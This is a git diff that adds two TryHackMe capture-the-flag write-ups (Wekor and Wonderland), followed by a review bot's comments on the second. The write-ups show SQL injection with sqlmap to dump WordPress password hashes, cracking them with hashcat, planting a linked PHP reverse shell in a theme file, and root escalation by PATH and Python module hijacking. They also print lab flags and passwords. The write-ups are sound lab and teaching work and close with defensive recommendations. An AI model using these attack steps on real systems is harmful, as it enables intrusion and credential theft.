sha256:d79287646c6a0cc319771a0e0eaaa2819fbdbdb948490651892c09cbd8b29236 +size 23740 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-7.png b/content/writeup-ctf/writeup-wekor-thm/img/image-7.png new file mode 100644 index 0000000..efa8946 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d82afec852cff1072ec7c5a528b3e8aeb5b61ec20b7538ef977815d45ed7d364 +size 32316 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-7.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-7.webp new file mode 100644 index 0000000..847226c --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a785699e05e28983378ccfb07bade2ca8e6ebb48f2b2ac07a8a23d699fe5b755 +size 28508 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-8.png b/content/writeup-ctf/writeup-wekor-thm/img/image-8.png new file mode 100644 index 0000000..fd98c13 --- /dev/null 
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:96d865df6cbcfef9b8f7ad439243658a33494954e65414e2c2d98cf792f094ad +size 15869 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-8.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-8.webp new file mode 100644 index 0000000..3f9ea49 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5279b851a4e2e4fad5603234fca9ca181a1b3e19bf890e4ea44703549c44c85 +size 30930 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-9.png b/content/writeup-ctf/writeup-wekor-thm/img/image-9.png new file mode 100644 index 0000000..32c71a4 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f92eb4fb8f5a7f3240b3a00c0b9a209bbfe123476f4f60f8f17c30c73b6b056e +size 27551 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-9.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-9.webp new file mode 100644 index 0000000..60f0874 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1d4cfce647740116837196988e1605b8cb99c6e09c0a615f9e081b38e2c17ac +size 31926 diff --git a/content/writeup-ctf/writeup-wekor-thm/index.md b/content/writeup-ctf/writeup-wekor-thm/index.md new file mode 100644 index 0000000..cf2783e --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/index.md 
@@ -0,0 +1,220 @@ +--- +title: "Writeup - Wekor (THM)" +date: 2022-04-17 +slug: "writeup-wekor-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Wekor](https://tryhackme.com/room/wekorra) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2) +- 80/tcp : HTTP web server (Apache 2.4.41) + +## Exploit + +At first I start by listing the pages of the website. + +![](img/image-2.webp) + +I find a `robots.txt` file in which the following pages are listed: + + +```bash +User-agent: * +Disallow: /workshop/ +Disallow: /root/ +Disallow: /lol/ +Disallow: /agent/ +Disallow: /feed +Disallow: /crawler +Disallow: /boot +Disallow: /comingreallysoon +Disallow: /interesting +``` +While exploring I come across the following message: + + +```bash +Welcome Dear Client! We've setup our latest website on /it-next, Please go check it out! If you have any comments or suggestions, please tweet them to @faketwitteraccount! Thanks a lot ! +``` +So there is a site hosted in the `it-next` next folder: + +![](img/image-3.webp) + +After some research I find an `Applie coupon` field on the `it_cart.php` page. I get a query using burp, then I run `sqlmap` to extract the database list. + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ sqlmap -r request.txt --dbs --batch + ___ + __H__ + ___ ___[(]_____ ___ ___ {1.6.4#stable} +|_ -| . ['] | .'| . | +|___|_ [)]_|_|_|__,| _| + |_|V... |_| https://sqlmap.org + +[...] 
+web application technology: Apache 2.4.18 +back-end DBMS: MySQL >= 5.6 +[16:07:49] [INFO] fetching database names +available databases [6]: +[*] coupons +[*] information_schema +[*] mysql +[*] performance_schema +[*] sys +[*] wordpress + +[16:07:49] [INFO] fetched data logged to text files under '/home/d3vyce/.local/share/sqlmap/output/wekor.thm' + +[*] ending @ 16:07:49 /2022-04-13/ +``` +I find a `wordpress` database, I will try to extract it with the following command: + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ sqlmap -r request.txt -D wordpress --dump --batch +[...] +[4 entries] ++------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+ +| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key | ++------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+ +| 1 | http://site.wekor.thm/wordpress | $P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B. 
| admin@wekor.thm | admin | 0 | admin | admin | 2021-01-21 20:33:37 | | +| 5743 | http://jeffrey.com | $P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10 | jeffrey@wekor.thm | wp_jeffrey | 0 | wp jeffrey | wp_jeffrey | 2021-01-21 20:34:50 | 1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0 | +| 5773 | http://yura.com | $P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/ | yura@wekor.thm | wp_yura | 0 | wp yura | wp_yura | 2021-01-21 20:35:27 | | +| 5873 | http://eagle.com | $P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/ (xxxxxx) | eagle@wekor.thm | wp_eagle | 0 | wp eagle | wp_eagle | 2021-01-21 20:36:11 | | ++------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+ +[...] +``` +In the interval I find 4 user/password pairs. I put them in a file and I run `hashcat`. + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ hashcat -m 400 hash wordlist/rockyou.txt +[...] +$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/:xxxxxx (eagle) +$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10:rockyou (jeffrey) +$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/:soccer13 (yura) +[...] +``` +After a few seconds, we find all the passwords except the one of Admin. Now that we have credentials, we need to find the wordpress site; I launch a subdomain scan. + +![](img/image-4.webp) + +I find the `site` subdomain, I add it to the `/etc/hosts`, then I go to the site. On this page, I find the following text: + + +```bash +Hi there! +Nothing here for now, but there should be an amazing website here in about 2 weeks, SO DON'T FORGET TO COME BACK IN 2 WEEKS! +- Jim +``` +This does not bring me much, so I launch a page scan on this subdomain. + +![](img/image-5.webp) + +After a few seconds I finally found the WordPress site! + +![](img/image-6.webp) + +So I go to the `wp-admin` page to connect to the admin panel. 
After trying the user `jeffrey`, I realize that he doesn't have admin permission, so I test the user `yura` and it works. I can now modify the content of the 404.php page of the twentytwentyone theme to add this [reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php). + +By accessing the following page I execute the php code : + + +```bash +http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/404.php +``` +I now have a reverse shell, but I don't have access to the first flag. + +![](img/image-7.webp) + +So I look if I can't find a file with an interesting service to change the user. In the open ports, I find the port 11211 : + +![](img/image-8.webp) + +After some research I find the following page of the [HackTricks](https://book.hacktricks.xyz/pentesting/11211-memcache) blog. After some experimentation, I manage to get the credencials of the user Orka in the cache. + +![](img/image-9.webp) + +I can now change the user and get the first flag back. + + +```bash +Orka@osboxes:~$ cat user.txt +cat user.txt +1a26a6d51c0172400add0e297608dec6 +``` +## Privilege escalation + +I start by checking the user's authorization. Interestingly, my user has the right to run the `bitcoin` script with root rights. + +![](img/image-10.webp) + +I try to launch the script but without success, it needs a password to launch it. + +![](img/image-11.webp) + +So I try to extract the strings from the program and I find the following in the result: + + +```bash +Orka@osboxes:~/Desktop$ strings bitcoin +[...] +Enter the password : +password +Access Denied... +Access Granted... + User Manual: +Maximum Amount Of BitCoins Possible To Transfer at a time : 9 +Amounts with more than one number will be stripped off! +And Lastly, be careful, everything is logged :) +Amount Of BitCoins : + Sorry, This is not a valid amount! +python /home/Orka/Desktop/transfer.py %c +[...] 
+``` +The password to use the program would be `password` and then there is the execution of a python script. What is interesting is the use of python without using a relative route. This combined with the fact that I have write permissions in the `/usr/sbin/python` folder which is in the `$PATH` variable, I will be able to create a custom version of the python program.ndes suivante : + + +```bash +touch /usr/sbin/python +echo '#!/bin/bash' > /usr/sbin/python +echo '/bin/bash' >> /usr/sbin/python +chmod +x /usr/sbin/python +``` +I now run the `bitcoin` program with sudo and enter the password. + +![](img/image-12.webp) + +I am now root of the machine and I can get the last flag. + + +```bash +root@osboxes:~/Desktop# cat /root/root.txt +cat /root/root.txt +f4e788f87cc3afaecbaf0f0fe9ae6ad7 +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Sanitizing Inputs must be implemented to avoid SQL injections +- Use strong passwords +- Set up Memcached authentication +- Use absolute paths when using programs in scripts diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-1.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-1.png new file mode 100644 index 0000000..3d87578 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b2af0845e1cb935f456d9760c16fdc8ab573da7d74425cb0b78aab1c2ec290a +size 37989 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-1.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-1.webp new file mode 100644 index 0000000..d798ca9 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba9e22efc1fcb2eb4cee19267ac0716b6edff8fd4a3e2288aa46200411a9b7c1 +size 33624 
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-10.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-10.png new file mode 100644 index 0000000..2edbb4b --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d41d93a8d1a4129aab20063868b0276eba78dc8cbc4fa6d2aec1913a4d008094 +size 16356 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-10.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-10.webp new file mode 100644 index 0000000..a190cc0 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dab120c1f48cf74393784e0233e89078ccda92169a4b7cb5465745321cfaa765 +size 18404 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-11.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-11.png new file mode 100644 index 0000000..abf6ef8 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fef6f0ae37931c6d61e9396d502c6b76312862e1d6ce05ca9b1114899b40fb66 +size 64633 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-11.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-11.webp new file mode 100644 index 0000000..0976621 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2aeade34849884c6cff93e69bf1f366b111ede78b94788e75d2e3d9a30febcf +size 48802 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-12.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-12.png new file mode 100644 index 0000000..a3ee4c2 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-12.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:114c3671044cc11c3ad5701cfbc1d3d4d10e63bd84f5311351c10e20ecfb0259 +size 9896 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-12.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-12.webp new file mode 100644 index 0000000..a622573 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b93f3100a1c246af9e5ca3db555fc692ca02285c09f448b5724f8336d315dc2 +size 9380 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-13.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-13.png new file mode 100644 index 0000000..727b38c --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cf030b66b51ce0b7385dc6084748506406ec1ee019b03abe4af9c69c60dd3050 +size 13793 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-13.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-13.webp new file mode 100644 index 0000000..5f990ef --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b263e7a95a415e72e24d06d8f249aa39045628aa7ec9fedf2f656835ce84f1ca +size 13468 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-2.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-2.png new file mode 100644 index 0000000..81dfb6a --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1bced9d847aba48b854830792a0b02a60056d882131dade37080a2b6231fff28 +size 1251849 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-2.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-2.webp new file mode 100644 index 0000000..38401b5 --- /dev/null 
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:352ce698a8a951a9e00d2d26fd314fe69af9f2b0076517c69e46b73b8955f88a +size 161972 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-3.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-3.png new file mode 100644 index 0000000..af8fc9f --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ddc137dc3fda66c9c81b3ca0cee5ab1ff76e6a897b8093e4097085b050b0169 +size 49707 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-3.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-3.webp new file mode 100644 index 0000000..5a55faa --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a83873affa1ec1430a8c33622138d9395fcd05d0f05b9cfbbf6c091c5e23054 +size 41162 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-4.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-4.png new file mode 100644 index 0000000..ceb7552 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d925edc50fb31a3d640fb2b590ad17d5ad05a29610a926f94908fb825a10236a +size 10990 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-4.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-4.webp new file mode 100644 index 0000000..298a1ad --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1188c0351d3d00fbeaa7e8ae32e50329a1c828f0a2cf3f16f1a4dc708cb1718c +size 7234 
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-5.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-5.png new file mode 100644 index 0000000..2c66461 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:945df4cd79df6df0f6b92480916b561274ca2446ee39d4fbf948f94bcdcd6cf4 +size 416267 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-5.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-5.webp new file mode 100644 index 0000000..2076b49 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2650182d839291e13e2795d732d37c68aec125ceea835987d521cb51a5424598 +size 205044 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-6.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-6.png new file mode 100644 index 0000000..4f3c92f --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5928ceafb7ac2d477ef4f8a920192450e445e52eda537954669798d58b27f9ca +size 36322 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-6.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-6.webp new file mode 100644 index 0000000..fb47b8f --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:729cef445acf551ec1971eba3dd54c084c06952d06e923dab6fa10056e7ee3c5 +size 33916 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-7.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-7.png new file mode 100644 index 0000000..c5eb1fa --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-7.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01ec977fc2776bd60239d92aa82cf58f8adc717f5b3fce24d2d609e8d6a86cdf +size 18929 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-7.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-7.webp new file mode 100644 index 0000000..5a71768 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:144e56bbb7e884101fb5fae7f64a85a56ea3a2369bf188e00975bc79470d3f78 +size 22504 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-8.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-8.png new file mode 100644 index 0000000..81f2318 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:589cc319bd281524eba53927da6e42044a1cb540782813d3498689d22c896113 +size 15054 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-8.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-8.webp new file mode 100644 index 0000000..5864b2b --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:532792dd21292c776971a3626957ff2784334b5afcf8bf1ccb02053a3d817a89 +size 24612 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-9.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-9.png new file mode 100644 index 0000000..90e7f4e --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee4b8c5e4c4d35ccbb9bba501c525a2a59403544d5fe406da313390399084db9 +size 18854 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-9.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-9.webp new file mode 100644 index 0000000..41f0f0f --- /dev/null 
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d35b3859057502af3d5695fd45a5b295aae272a2a49bba0a2923e8aa452137e7 +size 18274 diff --git a/content/writeup-ctf/writeup-wonderland-thm/index.md b/content/writeup-ctf/writeup-wonderland-thm/index.md new file mode 100644 index 0000000..bf633e5 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/index.md @@ -0,0 +1,185 @@ +--- +title: "Writeup - Wonderland (THM)" +date: 2022-05-20 +slug: "writeup-wonderland-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Wonderland](https://tryhackme.com/room/wonderland) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server + +![](img/image-2.webp) + +## Exploit + +At first I start by scanning the pages of the site: + +![](img/image-3.webp) + +When I go to the `r` page, I see the following message: + +![](img/image-4.webp) + +So I do a recursive scan to see the complete tree: + + +```bash +ffuf -c -u http://10.10.188.230/FUZZ -w wordlist/common.txt -recursion -recursion-depth 6 +``` +I finally find the following page: + +![](img/image-5.webp) + +I look at the source code of the page and find a `p` tag with a style that does not display it. The content of this tag looks very much like credentials... + + +```html + + + + Enter wonderland + + + + +

Open the door and enter wonderland

+

"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."

+

Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?" +

+

"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving + the other paw, "lives a March Hare. Visit either you like: they’re both mad."

+

alice:HowDothTheLittleCrocodileImproveHisShiningTail

+ + +``` +So I try to connect via SSH : + +![](img/image-6.webp) + +I now have a shell and can retrieve the first flag. + + +```bash +alice@wonderland:~$ cat /root/user.txt +thm{"Curiouser and curiouser!"} +``` +## Privilege escalation + +Looking at the contents of the `home` folder, I find several users: + + +```bash +alice@wonderland:/home$ ls +alice hatter rabbit tryhackme +``` +I am now looking at my sudo permissions: + +![](img/image-7.webp) + +So I can run this python script with the `rabbit` user's permissions. So I look at the content of this script: + + +```bash +import random +poem = """The sun was shining on the sea, +Shining with all his might: +He did his very best to make +The billows smooth and bright — +And this was odd, because it was +[...] +And that was scarcely odd, because +They’d eaten every one.""" + +for i in range(10): + line = random.choice(poem.split("\n")) + print("The line was:\t", line) +``` +I run it to make sure I've got it right. + +![](img/image-8.webp) + +So it's a script that allows to output 10 random sentences from the text included in the script. Interestingly, the script uses `random`. So I create a `random.py` file in the same folder in which I insert a reverse shell. When the script is executed, it should use our file! So I create this new file with the following content : + + +```bash +import pty +pty.spawn("/bin/bash") +``` +I now run the script with the following command: + +![](img/image-9.webp) + +In the folder of this new user, we find the file `teaParty`. Using the `strings` command, I can find the following readable text: + + +```bash +[...] +Welcome to the tea party! +The Mad Hatter will be here soon./bin/echo -n 'Probably by ' && date --date='next hour' -RAsk very nicely, and I will give you some tea while you wait for him +[...] +``` +The program uses the `date` command, but interestingly, the program doesn't use an absolute path. 
So I'll be able to create a script with the same name, and then add the folder that contains this new script to the `$PATH` variable. + +I start by creating the script with the following content: + + +```bash +#!/bin/bash +/bin/bash +``` +Then I add the execution permissions and I add my personal folder at the beginning of the `PATH` variable. + + +```bash +chmod +x date +export PATH=/home/rabbit:$PATH +``` +I can now run the program : + +![](img/image-10.webp) + +In the personal folder of this new user I find the following file: + + +```bash +hatter@wonderland:/home/hatter$ ls +password.txt +hatter@wonderland:/home/hatter$ cat password.txt +WhyIsARavenLikeAWritingDesk? +``` +So I try to connect via SSH with this password: + +![](img/image-11.webp) + +After some research to do a privilege elevation I find nothing. So I try to run linpeas.sh. By analyzing the output of the command I find the following lines: + +![](img/image-12.webp) + +By going on the [GTFObins de Perl](https://gtfobins.github.io/gtfobins/perl/#capabilities) I find a way to make a privilege elevation. + +Using the following command, I get a root shell and I can get the last flag. + +![](img/image-13.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave passwords in HTML code +- Use absolute paths in programs +- Do not leave clear passwords in files +- Modify Perl permissions to avoid elevation of privilege.
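Review bot: In content/writeup-ctf/writeup-wonderland-thm/index.md, the Recommendations list has no item for the first escalation step (alice to rabbit). The sudo rule runs a Python script that does `import random` from a folder the invoking user can write to, so the import resolves to the local `random.py`. I would add an entry for it, for example keeping the script in a directory that user cannot write to, or dropping the sudo rule. In the same list, "Modify Perl permissions" is vague. The finding is only shown in image-12 and the link points at the `#capabilities` section of GTFOBins, so the text should state the finding and recommend removing that capability from the perl binary. Smaller points in this hunk: the walrus script and the `random.py` snippet are fenced as `bash` but are Python; the nmap command targets 10.10.11.146 while the ffuf command targets 10.10.188.230, which needs either one address or a sentence saying the machine was restarted; the text calls `random.py` a "reverse shell" although the file only contains `pty.spawn("/bin/bash")`, a local shell; and the link text "GTFObins de Perl" still has a French "de" in it.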